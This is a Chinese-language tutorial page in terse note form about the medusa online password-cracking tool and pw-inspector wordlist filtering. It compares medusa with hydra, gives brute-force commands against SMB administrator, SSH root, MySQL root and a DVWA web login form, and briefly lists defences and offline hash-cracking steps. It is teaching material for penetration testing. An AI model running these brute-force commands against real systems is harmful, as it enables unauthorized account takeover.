medusa工具讲解(在线密码破解medusa)
pw-inspector
- 按长度和字符集筛选字典
pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l #提取小写字母
pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -u
- 密码复杂度(字典命中率)
- 带宽、协议、服务器性能、客户端性能
- 锁定阈值
- 单位时间最大登陆请求次数
- 稳定性差,程序时常崩溃
- 速度控制不好,容易触发服务屏蔽或锁死机制
- 每主机新建进程,没服务新建实例
- 大量目标破解时性能差
- 稳定性好
- 速度控制得当
- 基于线程
- 支持模块少于hydra(不支持RDP)
- WEB-Form支持存在缺陷
- 破解windows密码
medusa -M smbnt -h 1.1.1.1 -u administrator -P pass.lst -e ns -F
- 破解Linux SSH密码
medusa -M ssh -h 1.1.1.1 -u root -P pass.lst -e ns -F
- 其他服务密码破解
#mysql破解
medusa -M mysql -h 1.1.1.1 -e ns -F -u root -p pass.lst
#HTTP表单身份认证
medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pass=password&Login=Login"
-n 非默认端口
-s 使用SSL连接
-T 并发主机数
medusa -M ftp -q #查看帮助文档
- 禁止明文传输密码
- 每次认证使用HASH算法加密密码传输(HASH算法加密容易、解密困难)
- 服务器端用户数据库应加密保存
- 嗅探获取密码HASH
- 利用漏洞登陆服务器并从用户数据库获取密码HASH
- 识别HASH类型
- 长度、字符集
- 利用离线破解工具碰撞密码HASH
免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com
